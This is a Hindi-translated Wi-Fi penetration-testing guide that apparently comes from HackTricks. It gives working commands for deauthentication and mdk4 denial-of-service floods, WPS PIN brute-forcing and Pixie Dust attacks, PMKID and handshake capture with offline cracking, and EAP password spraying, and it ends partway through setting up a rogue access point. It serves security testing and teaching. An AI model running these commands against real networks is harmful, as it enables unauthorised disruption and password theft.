Pentesting Wifi

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

HackenProof Discord सर्वर में शामिल होकर अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इंसाइट्स हैकिंग के रोमांच और चुनौतियों में डूबने वाली सामग्री के साथ जुड़ें

रियल-टाइम हैक न्यूज़ तेजी से बदलती हैकिंग दुनिया के साथ कदम से कदम रहें अपडेटेड

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट्स के साथ सूचित रहें

हमारे साथ जुड़ें Discord और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

वाईफ़ाई मूल कमांड्स

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

उपकरण

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

एयरगेडन

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

डॉकर के साथ airgeddon चलाएं

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

यह Evil Twin, KARMA, और Known Beacons हमले कर सकता है और फिर फिशिंग टेम्पलेट का उपयोग करके नेटवर्क का वास्तविक पासवर्ड प्राप्त करने या सोशल नेटवर्क क्रेडेंशियल कैप्चर करने में सफल हो सकता है।

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

यह टूल WPS/WEP/WPA-PSK हमलों को स्वचालित करता है। यह स्वचालित रूप से करेगा:

  • इंटरफेस को मॉनिटर मोड में सेट करें

  • संभावित नेटवर्क के लिए स्कैन करें - और आपको पीड़ित(ओं) का चयन करने दें

  • यदि WEP है - WEP हमले शुरू करें

  • यदि WPA-PSK है

  • यदि WPS: Pixie dust हमला और ब्रूटफोर्स हमला (सावधान रहें, ब्रूटफोर्स हमला लंबा समय ले सकता है)। ध्यान दें कि यह शून्य पिन या डेटाबेस/जनरेटेड पिन की कोशिश नहीं करता है।

  • AP से PMKID को कैप्चर करने की कोशिश करें ताकि इसे क्रैक किया जा सके

  • AP के ग्राहकों को डीऑथेंटिकेट करने की कोशिश करें ताकि हैंडशेक को कैप्चर किया जा सके

  • यदि PMKID या हैंडशेक, टॉप5000 पासवर्ड का उपयोग करके ब्रूटफोर्स करने की कोशिश करें।

हमलों का सारांश

  • DoS

  • डीऑथेंटिकेशन/डिसेसोसिएशन -- सभी को डिस्कनेक्ट करें (या विशिष्ट ESSID/ग्राहक)

  • यादृच्छिक फर्जी एपी -- नेट्स छुपाएं, संभावना है कि स्कैनर को क्रैश करें

  • एपी को ओवरलोड करें -- एपी को मारने की कोशिश करें (आम तौर पर बहुत उपयोगी नहीं होता है)

  • WIDS -- आईडीएस के साथ खेलें

  • TKIP, EAPOL -- कुछ विशिष्ट हमले कुछ एपी को डीओएस करने के लिए

  • क्रैकिंग

  • WEP क्रैक करें (कई उपकरण और विधियाँ)

  • WPA-PSK

  • WPS पिन "ब्रूट-फोर्स"

  • WPA PMKID ब्रूटफोर्स

  • [DoS +] WPA हैंडशेक कैप्चर + क्रैकिंग

  • WPA-MGT

  • उपयोगकर्ता कैप्चर

  • ब्रूटफोर्स क्रेडेंशियल्स

  • ईविल ट्विन (डीओएस के साथ या बिना)

  • ओपन ईविल ट्विन [+ डीओएस] -- कैप्टिव पोर्टल क्रेडेंशियल्स को कैप्चर करने और/या लैन हमलों करने के लिए उपयोगी

  • WPA-PSK ईविल ट्विन -- उपयोगी नेटवर्क हमलों के लिए अगर आप पासवर्ड जानते हैं

  • WPA-MGT -- कंपनी क्रेडेंशियल्स को कैप्चर करने के लिए उपयोगी

  • KARMA, MANA, Loud MANA, पहचाने गए बीकन

  • + ओपन -- कैप्टिव पोर्टल क्रेडेंशियल्स को कैप्चर करने और/या लैन हमलों करने के लिए उपयोगी

  • + WPA -- WPA हैंडशेक को कैप्चर करने के लिए उपयोगी

DOS

डीऑथेंटिकेशन पैकेट्स

यहाँ से विवरण: यहाँ से:.

डीऑथेंटिकेशन हमले, वाई-फाई हैकिंग में एक प्रमुख विधि, नेटवर्क से उपकरणों को जबरदस्ती डिस्कनेक्ट करने के लिए "प्रबंधन" फ्रेम्स का जाल बिछाना शामिल है। ये अअनक्रिप्टेड पैकेट्स क्लाइंट्स को यह विश्वास दिलाते हैं कि वे वैध नेटवर्क से हैं, हमलावरों को WPA हैंडशेक को क्रैक करने के उद्देश्यों के लिए या नेटवर्क कनेक्शन को स्थायी रूप से विघटित करने के लिए। यह तकनीक, अपनी सरलता में चौंकाने वाली, व्यापक रूप से उपयोग की जाती है और नेटवर्क सुरक्षा के लिए महत्वपूर्ण परिणाम होते हैं।

Aireplay-ng का उपयोग करके डीऑथेंटिकेशन

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 का मतलब डीऑथेंटिकेशन है

  • 1 डीऑथेंटिकेशन भेजने की संख्या है (आप चाहें तो एक से अधिक भेज सकते हैं); 0 का मतलब उन्हें निरंतर भेजें

  • -a 00:14:6C:7E:40:80 एक्सेस प्वाइंट का MAC पता है

  • -c 00:0F:B5:34:30:30 डीऑथेंटिकेट करने के लिए क्लाइंट का MAC पता है; यदि यह छोड़ दिया जाता है तो प्रसारण डीऑथेंटिकेशन भेजा जाता है (हमेशा काम नहीं करता)

  • ath0 इंटरफेस का नाम है

वियोगन पैकेट्स

वियोगन पैकेट्स, डीऑथेंटिकेशन पैकेट्स के समान, एक प्रकार के प्रबंधन फ्रेम हैं जो वाई-फाई नेटवर्क में उपयोग किए जाते हैं। ये पैकेट्स एक उपकरण (जैसे लैपटॉप या स्मार्टफोन) और एक एक्सेस प्वाइंट (एपी) के बीच कनेक्शन को छेड़ने के लिए सेवा करते हैं। वियोगन और डीऑथेंटिकेशन के मध्य मुख्य भिन्नता उनके उपयोग स्थितियों में है। जबकि एक एपी नेटवर्क से रोग उपकरणों को स्पष्ट रूप से हटाने के लिए डीऑथेंटिकेशन पैकेट्स उत्पन्न करता है, वियोगन पैकेट्स सामान्यत: जब एपी बंद हो रहा है, पुनरारंभ हो रहा है, या स्थानांतरण किया जा रहा है, तो सभी कनेक्टेड नोडों का वियोगन करने की आवश्यकता होती है।

यह हमला mdk4 (मोड "डी") द्वारा किया जा सकता है:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 द्वारा अधिक DOS हमले

यहाँ में

हमला मोड b: बीकन फ्लडिंग

क्लाइंट्स पर नकली एपी को दिखाने के लिए बीकन फ्रेम भेजता है। यह कभी-कभी नेटवर्क स्कैनर और ड्राइवर को भी क्रैश कर सकता है!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

हमला मोड ए: प्रमाणीकरण सेवा की अस्वीकृति

सभी पहुंचने वाले एक्सेस प्वाइंट्स (APs) को प्रमाणीकरण फ्रेम भेजना इन APs को ओवरलोड कर सकता है, खासकर जब कई क्लाइंट शामिल होते हैं। यह तीव्र ट्रैफिक सिस्टम अस्थिरता की ओर ले जा सकता है, कुछ APs को फ्रीज करने या फिर रीसेट करने के कारण।

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

हमला मोड p: SSID प्रोबिंग और ब्रूटफोर्सिंग

एक्सेस पॉइंट्स (APs) की प्रोबिंग यह जांचती है कि क्या एक एसएसआईडी सही ढंग से प्रकट हो रहा है और एपी की दायरा सीमा की पुष्टि करती है। यह तकनीक, ब्रूटफोर्सिंग छिपी हुई SSIDs के साथ या बिना वर्डलिस्ट के, छिपी हुई नेटवर्क्स की पहचान और पहुंच करने में मदद करती है।

हमला मोड m: माइकल काउंटरमिजर्स शोषण

विभिन्न QoS कतारों में यादृच्छिक या डुप्लिकेट पैकेट भेजने से TKIP APs पर माइकल काउंटरमिजर्स को ट्रिगर किया जा सकता है, जिससे एक-मिनट के लिए एपी बंद हो जाता है। यह विधि एक प्रभावी डीओएस (सेवा की इनकार) हमला युक्तिक है।

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

हमला मोड e: EAPOL स्टार्ट और लॉगऑफ पैकेट इंजेक्शन

एक AP को EAPOL स्टार्ट फ्रेम के साथ भरना फर्जी सत्र बनाता है, AP को अधिक भर देता है और वास्तविक ग्राहकों को ब्लॉक करता है। वैकल्पिक रूप से, फर्जी EAPOL लॉगऑफ संदेश इंजेक्ट करने से ग्राहकों को जबरदस्ती डिस्कनेक्ट किया जा सकता है, दोनों तरीके नेटवर्क सेवा को प्रभावी रूप से व्यवधानित करते हैं।

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

हमला मोड s: IEEE 802.11s मेश नेटवर्क के लिए हमले

मेश नेटवर्क में लिंक प्रबंधन और रूटिंग पर विभिन्न हमले।

हमला मोड w: WIDS भ्रांति

क्रॉस-कनेक्टिंग क्लाइंट्स को कई WDS नोड्स या फर्जी रोग APs से जोड़ना आक्रमण निकासी और रोकने प्रणालियों में भ्रांति और संभावित सिस्टम दुरुपयोग उत्पन्न कर सकता है।

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

हमला मोड f: पैकेट फज़र

एक पैकेट फज़र जिसमें विभिन्न पैकेट स्रोत और पैकेट मेनिपुलेशन के लिए व्यापक संशोधकों का सेट है।

Airggedon

Airgeddon पिछले टिप्पणियों में प्रस्तावित अधिकांश हमलों को प्रस्तुत करता है:

WPS

WPS (Wi-Fi Protected Setup) डिवाइस को एक राउटर से कनेक्ट करने की प्रक्रिया को सरल बनाता है, WPA या WPA2 Personal से एन्क्रिप्ट किए गए नेटवर्क के लिए सेटअप की गति और सुविधा को बढ़ाता है। यह आसानी से कॉम्प्रोमाइज़ होने वाले WEP सुरक्षा के लिए असरदार नहीं है। WPS एक 8-अंक का पिन उपयोग करता है, जिसे दो भागों में सत्यापित किया जाता है, जिससे इसकी सीमित संख्या के कारण ब्रूट-फोर्स हमलों के लिए संवेदनशील हो जाता है (11,000 संभावनाएं)।

WPS ब्रूटफोर्स

इस कार्रवाई को करने के लिए 2 मुख्य उपकरण हैं: Reaver और Bully।

  • Reaver को WPS के खिलाफ एक मजबूत और व्यावहारिक हमला बनाने के लिए डिज़ाइन किया गया है, और इसे विभिन्न प्रकार के एक्सेस प्वाइंट्स और WPS कार्यान्वयनों के खिलाफ परीक्षण किया गया है।

  • Bully एक नई अमलीकरण है जो C में लिखा गया है और WPS ब्रूट फोर्स हमले का एक नया अमलीकरण है। इसके कई फायदे हैं: कम निर्भरताएँ, सुधारी गई मेमोरी और सीपीयू प्रदर्शन, एंडियनेस का सही संभालन, और एक और मजबूत विकल्प सेट।

यह हमला WPS पिन की कमजोरी का शोषण करता है, विशेष रूप से पहले चार अंकों की उजागरता और अंतिम अंक की भूमिका के रूप में एक checksum, जिससे ब्रूट-फोर्स हमला आसान हो जाता है। हालांकि, ब्रूट-फोर्स हमलों के खिलाफ रक्षा, जैसे आक्रामक हमलावरों के MAC पते ब्लॉक करना, हमले को जारी रखने के लिए MAC पते का घुमाव मांगती है।

Bully या Reaver जैसे उपकरणों के साथ WPS पिन प्राप्त करने पर, हमलावर WPA/WPA2 PSK का निर्धारण कर सकता है, स्थायी नेटवर्क एक्सेस सुनिश्चित करते हुए।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

स्मार्ट ब्रूट फोर्स

यह परिष्कृत दृष्टिकोण WPS PINs को लक्षित करता है जिसमें ज्ञात सुरक्षा दोषों का उपयोग किया जाता है:

  1. पूर्व-खोजे गए PINs: एक डेटाबेस का उपयोग करें जिसमें विशिष्ट निर्माताओं से जुड़े ज्ञात PINs होते हैं जिन्हें समान WPS PINs का उपयोग करने के लिए जाना जाता है। यह डेटाबेस MAC-पतों के पहले तीन अक्षरों को उन निर्माताओं के लिए संभावित PINs के साथ संबद्ध करता है।

  2. PIN उत्पादन एल्गोरिदम: ComputePIN और EasyBox जैसे एल्गोरिदम का उपयोग करें, जो AP के MAC-पति के आधार पर WPS PINs की गणना करते हैं। Arcadyan एल्गोरिदम एक उपकरण आईडी की भी आवश्यकता होती है, जो PIN उत्पादन प्रक्रिया में एक परत जोड़ता है।

WPS Pixie Dust हमला

डोमिनिक बोंगार्ड ने कुछ एक्सेस प्वाइंट्स (APs) में एक दोष खोजा जिसमें गुप्त कोडों का निर्माण है, जिन्हें नॉन्स (E-S1 और E-S2) के रूप में जाना जाता है। यदि इन नॉन्स को समझ लिया जा सकता है, तो AP का WPS PIN क्रैक करना आसान हो जाता है। AP एक विशेष कोड (हैश) में PIN को प्रकट करता है ताकि यह साबित कर सके कि यह वैध है और नकली (रोगी) AP नहीं है। ये नॉन्स मौजूदा हैं जो WPS PIN को रखने वाले "सुरक्षित" को "खोलने" की "चाबियाँ" हैं। इसके बारे में अधिक जानकारी यहाँ मिल सकती है।

सरल शब्दों में, समस्या यह है कि कुछ APs नेटवर्क के बाहर से अनुमान लगाने के लिए PIN को एन्क्रिप्ट करने के लिए पर्याप्त यादृच्छिक चाबियों का उपयोग नहीं करते थे। यह PIN को नेटवर्क के बाहर से अनुमान लगाने के लिए विकल्प ब्रूट फोर्स हमले के लिए संवेदनशील बनाता है।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

यदि आप डिवाइस को मॉनिटर मोड में स्विच करना नहीं चाहते हैं, या reaver और bully में कोई समस्या है, तो आप OneShot-C की कोशिश कर सकते हैं। यह टूल Pixie Dust हमला कर सकता है बिना मॉनिटर मोड में स्विच किए।

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

नल पिन हमला

कुछ खराब डिज़ाइन किए गए सिस्टम ने एक नल पिन (एक खाली या अस्तित्व न रखने वाला पिन) को एक्सेस प्रदान करने दिया, जो काफी असामान्य है। टूल Reaver इस वंलरबिलिटी के लिए टेस्ट करने में सक्षम है, जिसमें Bully नहीं है।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

सभी प्रस्तावित WPS हमले आसानी से airgeddon का उपयोग करके किए जा सकते हैं।

  • 5 और 6 आपको अपना कस्टम PIN आजमाने देते हैं (अगर आपके पास कोई है)

  • 7 और 8 Pixie Dust हमला करते हैं

  • 13 आपको NULL PIN की जांच करने देता है

  • 11 और 12 चयनित एपी से संबंधित PINs को पुनः जुटाएं और उपलब्ध डेटाबेस से संभावित PINs उत्पन्न करें: ComputePIN, EasyBox और वैकल्पिक रूप से Arcadyan (सिफारिश की गई है, क्यों नहीं?)

  • 9 और 10 हर संभावित PIN की जांच करें

WEP

अब तोड़ा और अप्रयोगित हो गया है। बस यह जान लें कि airgeddon के पास "All-in-One" नामक एक WEP विकल्प है जिसका उपयोग इस प्रकार की सुरक्षा को हमला करने के लिए किया जा सकता है। अधिकतर उपकरण समान विकल्प प्रदान करते हैं।


HackenProof Discord सर्वर में शामिल होकर अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इंसाइट्स हैकिंग के रोमांच और चुनौतियों में डूबने वाली सामग्री के साथ जुड़ें

रियल-टाइम हैक न्यूज़ तेज गति से हैकिंग दुनिया के साथ कदम से कदम रहें न्यूज़ और अंदाज़

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट के साथ अवगत रहें

Discord पर हमारे साथ जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!


WPA/WPA2 PSK

PMKID

2018 में, hashcat ने एक नया हमला विधि खोली, अद्वितीय क्योंकि इसे केवल एक ही पैकेट की आवश्यकता होती है और इसे लक्ष्य AP से किसी भी ग्राहक को कनेक्ट किए बिना केवल हमलावर और AP के बीच बातचीत की आवश्यकता होती है।

अधिकांश आधुनिक राउटर्स पहले EAPOL फ्रेम के दौरान संघ के लिए एक वैकल्पिक फ़ील्ड जोड़ते हैं, जिसे Robust Security Network कहा जाता है। इसमें PMKID शामिल है।

मूल पोस्ट के अनुसार, PMKID ज्ञात डेटा का उपयोग करके बनाया जाता है:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

यहां "PMK नाम" स्थिर होने के कारण, हमें एपी के BSSID और स्टेशन का पता है, और PMK पूर्ण 4-way हैंडशेक से एकसमान है, hashcat इस जानकारी का उपयोग करके PSK को क्रैक करने और पासफ्रेज को पुनः प्राप्त करने के लिए उपयोग कर सकता है!

इस जानकारी को एकत्र करने और लोकली पासवर्ड को ब्रूटफोर्स करने के लिए आप कर सकते हैं:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured को कंसोल में दिखाया जाएगा और इसे _/tmp/attack.pcap_ में सहेजा जाएगा। अब, कैप्चर को hashcat/john प्रारूप में परिवर्तित करें और इसे क्रैक करें:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

कृपया ध्यान दें कि एक सही हैश का सही फॉर्मेट 4 भाग में होता है, जैसे: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 अगर आपका केवल 3 भाग में है, तो यह अमान्य है (PMKID कैप्चर वैध नहीं था)।

ध्यान दें कि hcxdumptool हैंडशेक भी कैप्चर करता है (कुछ इस प्रकार का दिखेगा: MP:M1M2 RC:63258 EAPOLTIME:17091)। आप cap2hccapx का उपयोग करके हैंडशेक को hashcat/john प्रारूप में परिवर्तित कर सकते हैं।

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

मैंने देखा है कि इस टूल के साथ कुछ हैंडशेक जो कैप्चर किए गए हैं, उन्हें सही पासवर्ड जानने के बावजूद क्रैक नहीं किया जा सकता। मैं सलाह दूंगा कि यदि संभव हो तो हैंडशेक को पारंपरिक तरीके से भी कैप्चर किया जाए, या इस टूल का उपयोग करके कई हैंडशेक कैप्चर किया जाए।

हैंडशेक कैप्चर

WPA/WPA2 नेटवर्क पर हमला एक हैंडशेक को कैप्चर करके और पासवर्ड ऑफलाइन क्रैक करने के द्वारा किया जा सकता है। यह प्रक्रिया एक विशिष्ट नेटवर्क और BSSID पर एक विशेष चैनल पर संचार का मॉनिटरिंग करने को शामिल करती है। यहां एक संक्षिप्त मार्गदर्शिका है:

  1. लक्षित नेटवर्क का BSSID, चैनल, और कनेक्टेड क्लाइंट की पहचान करें।

  2. निर्दिष्ट चैनल और BSSID पर नेटवर्क ट्रैफिक का मॉनिटरिंग करने के लिए airodump-ng का उपयोग करें, उम्मीद हैंडशेक को कैप्चर करें। कमांड इस तरह की दिखेगी:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. हैंडशेक को कैप्चर करने की संभावना बढ़ाने के लिए, ग्राहक को नेटवर्क से कुछ समय के लिए डिस्कनेक्ट करें ताकि पुनर्प्रमाणीकरण को बल दिया जा सके। इसे aireplay-ng कमांड का उपयोग करके किया जा सकता है, जो ग्राहक को डी-ऑथेंटिकेशन पैकेट भेजता है:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

ध्यान दें कि जैसे क्लाइंट को डीऑथेंटिकेट किया गया था, वह एक विभिन्न एपी से कनेक्ट करने की कोशिश कर सकता है या, अन्य मामलों में, एक विभिन्न नेटवर्क से कनेक्ट करने की कोशिश कर सकता है।

एक बार airodump-ng में हैंडशेक जानकारी दिखाई देती है तो इसका मतलब है कि हैंडशेक को कैप्चर किया गया है और आप सुनना बंद कर सकते हैं:

हैंडशेक को कैप्चर करने के बाद आप इसे aircrack-ng के साथ क्रैक कर सकते हैं:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

फ़ाइल में हैंडशेक की जाँच करें

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

काऊपैटी

cowpatty -r psk-01.cap -s "ESSID" -f -

यदि यह टूल एक ESSID का अपूर्ण हैंडशेक खोजता है जो पूरा नहीं होता है, तो यह मान्य वाला नहीं डिटेक्ट करेगा।

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA एंटरप्राइज (MGT)

एंटरप्राइज WiFi सेटअप में, आपको विभिन्न प्रमाणीकरण विधियाँ मिलेंगी, प्रत्येक अलग-अलग सुरक्षा स्तर और प्रबंधन सुविधाएं प्रदान करती हैं। जब आप airodump-ng जैसे उपकरणों का उपयोग नेटवर्क ट्रैफिक की जांच करने के लिए करते हैं, तो आपको इन प्रमाणीकरण प्रकारों के पहचानकर्ता दिखाई देंगे। कुछ सामान्य विधियाँ शामिल हैं:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (जेनेरिक टोकन कार्ड):

  • यह विधि हार्डवेयर टोकन और एक समय पासवर्ड का समर्थन करती है EAP-PEAP के भीतर। MSCHAPv2 की तरह, यह पीयर चैलेंज का उपयोग नहीं करती और पासवर्ड को प्लेनटेक्स्ट में एक्सेस पॉइंट को भेजती है, जिससे डाउनग्रेड हमलों के लिए खतरा बनता है।

  1. EAP-MD5 (मैसेज डाइजेस्ट 5):

  • क्लाइंट से पासवर्ड के MD5 हैश को भेजने का शामिल है। यह सिफारिश नहीं की जाती क्योंकि यह शब्दकोश हमलों के लिए वंशानुक्रमण के लिए, सर्वर प्रमाणीकरण की कमी के लिए, और सत्र-विशेषित WEP कुंजियों को उत्पन्न करने की असमर्थता के कारण।

  1. EAP-TLS (ट्रांसपोर्ट लेयर सुरक्षा):

  • प्रमाणीकरण के लिए क्लाइंट-साइड और सर्वर-साइड प्रमाणपत्रों का उपयोग करती है और संचार को सुरक्षित करने के लिए उपयोगकर्ता-आधारित और सत्र-आधारित WEP कुंजियों को डायनामिक रूप से उत्पन्न कर सकती है।

  1. EAP-TTLS (टनल्ड ट्रांसपोर्ट लेयर सुरक्षा):

  • एक एन्क्रिप्टेड टनल के माध्यम से साथी प्रमाणीकरण प्रदान करती है, साथ ही एक विधि प्रदान करती है जिससे डायनामिक, प्रति-उपयोगकर्ता, प्रति-सत्र WEP कुंजियां उत्पन्न होती हैं। इसमें केवल सर्वर-साइड प्रमाणपत्र होते हैं, जबकि ग्राहकों का प्रमाण होता है।

  1. PEAP (सुरक्षित विस्तारणीय प्रमाणीकरण प्रोटोकॉल):

  • सुरक्षित संचार के लिए एक TLS टनल बनाकर EAP की तरह कार्य करती है। यह EAP के ऊपर कमजोर प्रमाणीकरण प्रोटोकॉलों का उपयोग करने की अनुमति देती है क्योंकि टनल द्वारा प्रदान की गई सुरक्षा के कारण।

  • PEAP-MSCHAPv2: अक्सर PEAP के रूप में उल्लेख किया जाता है, यह जोखिमपूर्ण MSCHAPv2 चैलेंज/प्रतिक्रिया तंत्र को एक सुरक्षित TLS टनल के साथ मिलाती है।

  • PEAP-EAP-TLS (या PEAP-TLS): EAP-TLS के समान है लेकिन प्रमाणपत्रों को आदान-प्रदान करने से पहले एक TLS टनल प्रारंभ करती है, जो एक अतिरिक्त सुरक्षा स्तर प्रदान करता है।

आप इन प्रमाणीकरण विधियों के बारे में अधिक जानकारी यहाँ और यहाँ पा सकते हैं।

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

आप इस हमला eaphammer का उपयोग करके भी कर सकते हैं:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

क्लाइंट हमले सिद्धांत

नेटवर्क चयन और रोमिंग

  • 802.11 प्रोटोकॉल पोस्ट नहीं करता कि स्टेशन एक विस्तारित सेवा सेट (ESS) में कैसे शामिल होता है, लेकिन एक ESS या उसमें एक एक्सेस प्वाइंट (AP) का चयन करने के मानकों को निर्धारित नहीं करता है।

  • स्टेशन एक ही ESSID को साझा करने वाले एपी के बीच घूम सकते हैं, इमारत या क्षेत्र के अधिकार को बनाए रखते हुए।

  • प्रोटोकॉल ESS के लिए स्टेशन प्रमाणीकरण की आवश्यकता है, लेकिन एपी स्टेशन को प्रमाणीकरण करने की अनिवार्यता नहीं है।

पसंदीदा नेटवर्क सूची (PNLs)

  • स्टेशन अपनी पसंदीदा नेटवर्क सूची (PNL) में उन सभी वायरलेस नेटवर्कों के ESSID को संयुक्त रूप से संयुक्त करते हैं, जिनसे वे कनेक्ट होते हैं, साथ ही नेटवर्क-विशिष्ट कॉन्फ़िगरेशन विवरण।

  • PNL का उपयोग जाने वाले नेटवर्कों से स्वचालित रूप से कनेक्ट होने के लिए किया जाता है, जो उपयोगकर्ता के अनुभव को सुगम बनाने के लिए कनेक्शन प्रक्रिया को सुगम बनाता है।

पैसिव स्कैनिंग

  • एपी नियमित अंतराल से बीकन फ्रेम प्रसारित करते हैं, अपनी मौजूदगी और विशेषताएँ घोषित करते हैं, जिसमें एपी का ESSID शामिल है यदि प्रसारण निषेधित नहीं है।

  • पैसिव स्कैनिंग के दौरान, स्टेशन बीकन फ्रेम के लिए सुनते हैं। यदि किसी बीकन का ESSID स्टेशन की PNL में एक प्रविष्टि से मेल खाता है, तो स्टेशन उस एपी से स्वचालित रूप से कनेक्ट हो सकता है।

  • एक डिवाइस की PNL का ज्ञान एक जाना-माना नेटवर्क के ESSID का मिमिक करके डिवाइस को एक रोग AP से कनेक्ट करने के लिए संभावित शोषण की अनुमति देता है।

सक्रिय प्रोबिंग

  • सक्रिय प्रोबिंग में स्टेशन निकटवर्ती एपी की खोज करने के लिए प्रोब अनुरोध भेजते हैं और उनकी विशेषताएँ खोजते हैं।

  • निर्देशित प्रोब अनुरोध एक विशिष्ट ESSID को लक्षित करते हैं, जिससे पता चलता है कि क्या कोई विशेष नेटवर्क सीमा में है, भले ही वह एक छुपा हुआ नेटवर्क हो।

  • प्रसारित प्रोब अनुरोधों में एक शून्य SSID क्षेत्र होता है और उन्हें सभी निकटवर्ती एपी को भेजा जाता है, जिससे स्टेशन किसी भी पसंदीदा नेटवर्क की जांच कर सकता है बिना अपनी PNL सामग्री को उजागर करते हुए।

इंटरनेट पर रिडायरेक्शन के साथ सरल एपी

अधिक जटिल हमले कैसे करने के बारे में समझाने से पहले बताया जाएगा कि कैसे एक एपी बनाया जाता है और इसका ट्रैफिक एक इंटरफेस पर रीडायरेक्ट किया जाता है जो इंटरनेट से जुड़ा होता है।

ifconfig -a का उपयोग करके जांचें कि एपी बनाने के लिए wlan इंटरफेस और इंटरनेट से जुड़े इंटरफेस मौजूद हैं।

DHCP और DNS

apt-get install dnsmasq #Manages DHCP and DNS

फ़ाइल /etc/dnsmasq.conf कॉन्फ़िग फ़ाइल बनाएँ:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

फिर IPs सेट करें और रूटें सेट करें:

